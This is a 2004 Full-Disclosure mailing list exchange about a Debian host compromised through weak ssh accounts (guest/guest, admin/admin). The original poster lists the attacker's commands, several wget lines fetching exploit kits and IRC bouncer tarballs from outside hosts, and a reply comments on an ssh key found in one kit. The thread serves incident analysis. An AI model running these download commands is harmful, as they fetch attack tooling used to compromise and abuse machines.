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From: venom at gen-x.co.nz (VeNoMouS)
Subject: Automated ssh scanning

lol at roarmy.com/god.tgz


strings the "h" file one would assume thats where he orignally made the kit, 
its a ssh key from lessons.menchey.com


----- Original Message ----- 
From: "Richard Verwayen" <holle@...w.de>
To: "FD" <full-disclosure@...ts.netsys.com>
Sent: Thursday, August 26, 2004 10:32 AM
Subject: [Full-Disclosure] Automated ssh scanning


> Hello list!
>
> A few weeks ago there was a discussion about automated ssh scanning with
> user/password combinations like guest/guest or admin/admin.
> I set up a debian woody fully patched with both accounts activated, and
> got rooted some days later...
>
> The attackers installed some software and irc-bots and tried to use this
> host for testing other computers, thats not the point. I would like to
> know where's the weak point in the system? As the system was updates on
> a daily base! The only known weakness were these two accounts!
>
> Here is a list of software the attacker used, maybe someone could bring
> a bit light into this tunnel!
>
> wget sky.prohosting.com/awxro/linux/xpl.tar.gz
> wget www.bo2k-rulez.net/a
> wget www.bo2k-rulez.net/psybnc.tgz
> wget www.corbeanu.as.ro/t.gz
> wget roarmy.com/god.tgz
> wget www.generatiapro.go.ro/fast.tgz
>
>
> Richard
>
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